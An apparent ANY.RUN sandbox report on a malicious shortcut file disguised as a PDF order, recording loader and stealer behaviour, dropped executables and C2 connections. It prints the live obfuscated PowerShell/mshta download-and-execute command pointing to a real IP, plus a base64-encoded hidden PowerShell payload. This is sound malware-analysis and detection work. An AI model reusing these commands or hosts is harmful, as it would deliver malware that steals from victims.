File name:

window_order.pdf.lnk

Full analysis: https://app.any.run/tasks/3df68397-d8a3-49a0-b465-f318e3b9c5be
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: May 12, 2025, 07:25:14
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
susp-powershell
aurotun
stealer
evasion
auto-startup
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe", length=0, window=showminnoactive, IDListSize 0x020d, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\"
MD5:

78CF06686D9BA131636BEA5C47719ADE

SHA1:

6C9151D61DF9DE961602B10941C66E643C6780B6

SHA256:

147F7EB48A69D39DC6066A62D6F3DC39C7AB77D21D51B0CA1F9C7F69CEA9A640

SSDEEP:

24:8N84Zsx/Tff1efVKayWtC+/CWQ9lzdlOzRfpMlPP/ddS9dbEQPEZ/7QAMN5:8wTX1e3ztIlzOzRKdP/do9aQPa7Q

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executing a file with an untrusted certificate

      • CrystaMod64.exe (PID: 6760)
      • CrystaMod64.exe (PID: 7000)
      • XPFix.exe (PID: 7992)
    • AUROTUN mutex has been found

      • CircOptimizer86.exe (PID: 7488)
    • Connects to the CnC server

      • CircOptimizer86.exe (PID: 7488)
  • SUSPICIOUS

    • Uses WMI to retrieve WMI-managed resources (SCRIPT)

      • mshta.exe (PID: 5204)
    • Connects to the server without a host name

      • mshta.exe (PID: 5204)
      • powershell.exe (PID: 1164)
    • Executes script without checking the security policy

      • powershell.exe (PID: 1164)
    • Executed via WMI

      • powershell.exe (PID: 1164)
    • Creates an object to access WMI (SCRIPT)

      • mshta.exe (PID: 5204)
    • Converts a specified value to an integer (POWERSHELL)

      • powershell.exe (PID: 1164)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 1164)
      • window.exe (PID: 8164)
      • window.exe (PID: 5968)
      • CrystaMod64.exe (PID: 6760)
      • CrystaMod64.exe (PID: 7000)
    • Starts itself from another location

      • window.exe (PID: 8164)
      • CrystaMod64.exe (PID: 6760)
    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 1164)
    • Process requests binary or script from the Internet

      • powershell.exe (PID: 1164)
    • Checks for external IP

      • CircOptimizer86.exe (PID: 7488)
      • svchost.exe (PID: 2196)
    • Connects to unusual port

      • CircOptimizer86.exe (PID: 7488)
  • INFO

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 2516)
      • powershell.exe (PID: 1164)
    • Checks proxy server information

      • mshta.exe (PID: 5204)
      • powershell.exe (PID: 1164)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 5204)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1164)
    • Disables trace logs

      • powershell.exe (PID: 1164)
    • Manual execution by a user

      • msedge.exe (PID: 7812)
    • Checks supported languages

      • window.exe (PID: 8164)
      • window.exe (PID: 5968)
      • identity_helper.exe (PID: 8096)
      • CrystaMod64.exe (PID: 7000)
      • CrystaMod64.exe (PID: 6760)
      • CircOptimizer86.exe (PID: 7488)
      • XPFix.exe (PID: 7992)
    • Create files in a temporary directory

      • window.exe (PID: 8164)
      • window.exe (PID: 5968)
      • CrystaMod64.exe (PID: 7000)
      • XPFix.exe (PID: 7992)
    • The sample compiled with chinese language support

      • window.exe (PID: 5968)
      • CrystaMod64.exe (PID: 7000)
    • Application launched itself

      • msedge.exe (PID: 1328)
    • Reads the computer name

      • identity_helper.exe (PID: 8096)
      • window.exe (PID: 5968)
      • CrystaMod64.exe (PID: 7000)
      • CrystaMod64.exe (PID: 6760)
      • CircOptimizer86.exe (PID: 7488)
      • XPFix.exe (PID: 7992)
    • The sample compiled with english language support

      • powershell.exe (PID: 1164)
      • window.exe (PID: 8164)
      • window.exe (PID: 5968)
      • CrystaMod64.exe (PID: 6760)
      • CrystaMod64.exe (PID: 7000)
    • Reads Environment values

      • identity_helper.exe (PID: 8096)
    • Creates files in the program directory

      • CrystaMod64.exe (PID: 6760)
    • Creates files or folders in the user directory

      • CrystaMod64.exe (PID: 7000)
    • Reads the software policy settings

      • slui.exe (PID: 6044)
    • Process checks computer location settings

      • CircOptimizer86.exe (PID: 7488)
    • Reads the machine GUID from the registry

      • CircOptimizer86.exe (PID: 7488)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

Flags: IDList, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
FileAttributes: (none)
TargetFileSize: -
IconIndex: 11
RunWindow: Show Minimized No Activate
HotKey: (none)
TargetFileDOSName: powershell.exe
RelativePath: ..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLineArguments: scb ('%%%m%%shta% h%%ttp%%%://91%.%%%%2%%%00.1%%%4.%%%%15%%%%3/Do%%wnl%%%%o%%%%a%%%%ds%%%%/%%%w%i%%%%n%%%%d%%%%o%%%%w_%%%%order%.%m%%%%p%%4%%%%'.replace('%',''));iex (gcb)
IconFileName: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
180
Monitored processes
48
Malicious processes
4
Suspicious processes
2

Behavior graph

Click at the process to see the details
start powershell.exe no specs conhost.exe no specs sppextcomobj.exe no specs slui.exe mshta.exe powershell.exe conhost.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs identity_helper.exe no specs identity_helper.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs window.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs window.exe crystamod64.exe crystamod64.exe #AUROTUN circoptimizer86.exe slui.exe no specs xpfix.exe no specs msedge.exe no specs msedge.exe no specs svchost.exe msedge.exe no specs msedge.exe no specs msedge.exe no specs msedge.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
456"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=5876 --field-trial-handle=2412,i,14055060117351381713,12454802338250158997,262144 --variations-seed-version /prefetch:1C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
976"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2732 --field-trial-handle=2412,i,14055060117351381713,12454802338250158997,262144 --variations-seed-version /prefetch:8C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1164powershell.exe -w h -nop -ep un -E JABlAGgAWgBTAEwARgBLAFkAVAA9ACcAKgA5ACoANQA3ADgAKgA4ADcALwAvADcALwAvADcAMAA3ADMAMwBBADIARgAyAEYAMwAwADcAOAAzADAAMgBFADcAMwA3AC8ALwAyAEYAMwA4ADMALwAvAC8ALwBDADMAMQAyAEUANwAwACoALwAvACoAKgAyAEYANwA3ACoAOQAqAEUAKgAvAC8AKgBGADcANwA1AEYAKgBGADcAMgAqAC8ALwAqADUANwAyADIARQA3ADAAKgAvAC8AKgAqACoAOAA3AC8ALwA3AC8ALwA3ADAAMwBBADIARgAyAEYAMwA5ADMAMQAyAEUAMwAyADMAMAAzADAAMgBFADMAMQAzAC8ALwAyAEUAMwAxADMANQAzADMAMgBGAC8ALwAvAC8AKgBGADcANwAqAEUAKgBDACoARgAqADEAKgAvAC8ANwAzADIARgA3ADcAKgA5ACoARQAqAC8ALwAqAEYANwA3ADIARQAqADUANwA4ACoANQAyAC8ALwAvAC8AMQAqAC8ALwAqAEUAKgBDAC8ALwBBAC8ALwBBADUAMQAqAEIAMgAwADMARAAyADAAMgAvAC8AKgA1ACoARQA3ACoAMwBBAC8ALwAxADcAMAA3ADAALwAvAC8ALwAqADEANwAvAC8AKgAxADMAQgAqACoANwA1ACoARQAqADMANwAvAC8AKgA5ACoARgAqAEUAMgAwADcAOQA1ADAAKgBGAC8ALwAyADUAMQAqADgAMgA4ADIALwAvACoAQwAvAC8ARQAqAEQALwAvADkALwAvAEUAKgA5AC8ALwA5ADIAQwAyADAAMgAvAC8ANwAxAC8ALwA1ADUANQAqAC8ALwAvAC8AOAAvAC8AKgA1ACoAKgAqADIAOQA3AEIAKgAzADcANQA3ADIAKgBDADIAMAAyAC8ALwAqAEMALwAvAEUAKgBEAC8ALwA5AC8ALwBFACoAOQAvAC8AOQAyADAAMgBEACoARgAyADAAMgAvAC8ANwAxAC8ALwA1ADUANQAqAC8ALwAvAC8AOAAvAC8AKgA1ACoAKgAqADcARAAzAEIAKgAqADcANQAqAEUAKgAzADcALwAvACoAOQAqAEYAKgBFADIAMAAqAEIALwAvAEMAKgAvAC8AKgA1ADcAOAA3ADgALwAvADIALwAvAEIANwAvAC8AMgA4ADIALwAvACoANQAqADgANQBBADUAMwAvAC8AQwAvAC8AKgAvAC8AQgA1ADkANQAvAC8AMgA5ADcAQgA3ADkANQAwACoARgAvAC8AMgA1ADEAKgA4ADIAMAAyAC8ALwAqADUAKgA4ADUAQQA1ADMALwAvAEMALwAvACoALwAvAEIANQA5ADUALwAvADIAMAAyAC8ALwA3ADEALwAvADUANQA1ACoALwAvAC8ALwA4AC8ALwAqADUAKgAqACoANwBEADcAMwA3AC8ALwAqADEANwAyADcALwAvADIAMAAyAC8ALwAvAC8AOAAvAC8AMgAvAC8ALwAvADcAKgAvAC8AKgA1ADAALwAvADIALwAvACoAMgBFADUAMwA3ADUAKgAyADUAMwA3AC8ALwA3ADIAKgA5ACoARQAqADcAMgA4ADMAMwAyAEMAMwAvAC8AMwAwADIAOQAzAEIAMgAvAC8ANwAxAC8ALwA1ADUANQAqAC8ALwAvAC8AOAAvAC8AKgA1ACoAKgAqADIAMAAzAEQAMgAwADIALwAvACoANQAqAEUANwAqADMAQQAvAC8AMQA3ADAANwAwAC8ALwAvAC8AKgAxADcALwAvACoAMQAyADAAMgBCADIAMAAyADcANQBDADcANwAqADkAKgBFACoALwAvACoARgA3ADcAMgBFACoANQA3ADgAKgA1ADIANwAzAEIAKgBCAC8ALwBDACoALwAvACoANQA3ADgANwA4AC8ALwAyAC8ALwBCADcALwAvADIAMAAyAC8ALwAvAC8AOAAvAC8AMgAvAC8ALwAvADcAKgAvAC8AKgA1ADAALwAvADIALwAvACoAMgBFADUAMwA3ADUAKgAyADUAMwA3AC8ALwA3ADIAKgA5ACoARQAqADcAMgA4ADMALwAvADMAMwAyAEMAMwAvAC8AMwAxADIAOQAzAEIANwAzADcALwAvACoAMQA3ADIANwAvAC8AMgAwADIALwAvADcAMQAvAC8ANQA1ADUAKgAvAC8ALwAvADgALwAvACoANQAqACoAKgAzAEIAMwBCACcALgBSAGUAcABsAGEAYwBlACgAIgAvAC8AIgAsACAAIgA0ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACoAIgAsACAAIgA2ACIAKQA7ACQASABCAEQAdgBGAFAAQgBGAD0AKAAkAGUAaABaAFMATABGAEsAWQBUACAALQBzAHAAbABpAHQAIAAnACgAPwA8AD0AXABHAC4ALgApACcAfAAlAHsAWwBjAGgAYQByAF0AKABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEkAbgB0ADMAMgAoACQAXwAsADEANgApACkAfQApACAALQBqAG8AaQBuACAAJwAnADsAIAAmACAAJABIAEIARAB2AEYAUABCAEYALgBTAHUAYgBzAHQAcgBpAG4AZwAoADAALAAzACkAIAAkAEgAQgBEAHYARgBQAEIARgA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\atl.dll
c:\windows\system32\combase.dll
1184"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=4376 --field-trial-handle=2412,i,14055060117351381713,12454802338250158997,262144 --variations-seed-version /prefetch:1C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exemsedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1328"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://0x0.st/84L1.pdf/window_order.pdfC:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1672\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1764\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2504"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2684 --field-trial-handle=2412,i,14055060117351381713,12454802338250158997,262144 --variations-seed-version /prefetch:3C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Edge
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2516"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" scb ('%%%m%%shta% h%%ttp%%%://91%.%%%%2%%%00.1%%%4.%%%%15%%%%3/Do%%wnl%%%%o%%%%a%%%%ds%%%%/%%%w%i%%%%n%%%%d%%%%o%%%%w_%%%%order%.%m%%%%p%%4%%%%'.replace('%',''));iex (gcb)C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
17 874
Read events
17 849
Write events
25
Delete events
0

Modification events

(PID) Process:(5204) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(5204) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(5204) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(1328) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:failed_count
Value:
0
(PID) Process:(1328) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:state
Value:
2
(PID) Process:(1328) msedge.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Edge\BLBeacon
Operation:writeName:state
Value:
1
(PID) Process:(1164) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation:writeName:SlowContextMenuEntries
Value:
6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(PID) Process:(1164) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(1164) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(1164) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
Executable files
27
Suspicious files
230
Text files
53
Unknown types
0

Dropped files

PID
Process
Filename
Type
1328msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old~RF10f80e.TMP
MD5:
SHA256:
1328msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\parcel_tracking_db\LOG.old
MD5:
SHA256:
1328msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old~RF10f81d.TMP
MD5:
SHA256:
1328msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old~RF10f81d.TMP
MD5:
SHA256:
1328msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\commerce_subscription_db\LOG.old
MD5:
SHA256:
2516powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_j0eddguf.21f.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2516powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_p05rqbqe.d3y.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
2516powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\de8c8689daa88438.customDestinations-msbinary
MD5:A085124F72EEDA43F7B75662585B8286
SHA256:08985B9E324924B93CAFB224A50B2D4BE189B4B3792ACB89FADE3DF3AEED8513
1328msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\discounts_db\LOG.old~RF10f80e.TMP
MD5:
SHA256:
1328msedge.exeC:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Default\PersistentOriginTrials\LOG.old
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
29
TCP/UDP connections
61
DNS requests
55
Threats
14

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
7488
CircOptimizer86.exe
GET
200
208.95.112.1:80
http://ip-api.com/json/84.17.48.159
unknown
whitelisted
756
lsass.exe
GET
200
142.250.185.131:80
http://c.pki.goog/r/r4.crl
unknown
whitelisted
4988
svchost.exe
HEAD
200
199.232.214.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/cf34b06a-2f53-4bd0-9d11-b58cf2e820a4?P1=1747346576&P2=404&P3=2&P4=eLpdvzHg3BdNCBS13K7gALHKXNvr6oHNivFPsh54xS6%2b%2bITiXS73hsbUSvdTgdXvFK%2fE4EAqr2BzrzHTkkkpuA%3d%3d
unknown
whitelisted
4988
svchost.exe
GET
206
199.232.214.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/cf34b06a-2f53-4bd0-9d11-b58cf2e820a4?P1=1747346576&P2=404&P3=2&P4=eLpdvzHg3BdNCBS13K7gALHKXNvr6oHNivFPsh54xS6%2b%2bITiXS73hsbUSvdTgdXvFK%2fE4EAqr2BzrzHTkkkpuA%3d%3d
unknown
whitelisted
4988
svchost.exe
GET
206
199.232.214.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/cf34b06a-2f53-4bd0-9d11-b58cf2e820a4?P1=1747346576&P2=404&P3=2&P4=eLpdvzHg3BdNCBS13K7gALHKXNvr6oHNivFPsh54xS6%2b%2bITiXS73hsbUSvdTgdXvFK%2fE4EAqr2BzrzHTkkkpuA%3d%3d
unknown
whitelisted
4988
svchost.exe
GET
206
199.232.214.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/cf34b06a-2f53-4bd0-9d11-b58cf2e820a4?P1=1747346576&P2=404&P3=2&P4=eLpdvzHg3BdNCBS13K7gALHKXNvr6oHNivFPsh54xS6%2b%2bITiXS73hsbUSvdTgdXvFK%2fE4EAqr2BzrzHTkkkpuA%3d%3d
unknown
whitelisted
4988
svchost.exe
GET
206
199.232.214.172:80
http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/cf34b06a-2f53-4bd0-9d11-b58cf2e820a4?P1=1747346576&P2=404&P3=2&P4=eLpdvzHg3BdNCBS13K7gALHKXNvr6oHNivFPsh54xS6%2b%2bITiXS73hsbUSvdTgdXvFK%2fE4EAqr2BzrzHTkkkpuA%3d%3d
unknown
whitelisted
GET
200
23.48.23.177:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2104
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
23.48.23.177:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
23.35.229.160:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
20.190.160.17:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
5204
mshta.exe
91.200.14.153:80
UA
unknown
1164
powershell.exe
91.200.14.153:80
UA
unknown

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted
crl.microsoft.com
  • 23.48.23.177
  • 23.48.23.173
  • 23.48.23.178
  • 23.48.23.167
  • 23.48.23.157
  • 23.48.23.185
  • 23.48.23.169
  • 23.48.23.160
  • 23.48.23.164
whitelisted
www.microsoft.com
  • 23.35.229.160
whitelisted
google.com
  • 142.250.184.238
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
login.live.com
  • 20.190.160.17
  • 40.126.32.72
  • 20.190.160.67
  • 40.126.32.133
  • 40.126.32.138
  • 20.190.160.64
  • 40.126.32.68
  • 20.190.160.4
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
config.edge.skype.com
  • 13.107.42.16
whitelisted
edge.microsoft.com
  • 150.171.29.11
  • 150.171.30.11
  • 150.171.28.11
  • 150.171.27.11
whitelisted
edge-mobile-static.azureedge.net
  • 40.90.65.181
whitelisted

Threats

PID
Process
Class
Message
1164
powershell.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
1164
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
1164
powershell.exe
Misc activity
ET INFO Request for EXE via Powershell
1164
powershell.exe
Misc activity
ET INFO Packed Executable Download
1164
powershell.exe
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
1164
powershell.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
2504
msedge.exe
Misc activity
ET FILE_SHARING File Sharing Related Domain in DNS Lookup (0x0 .st)
2504
msedge.exe
Misc activity
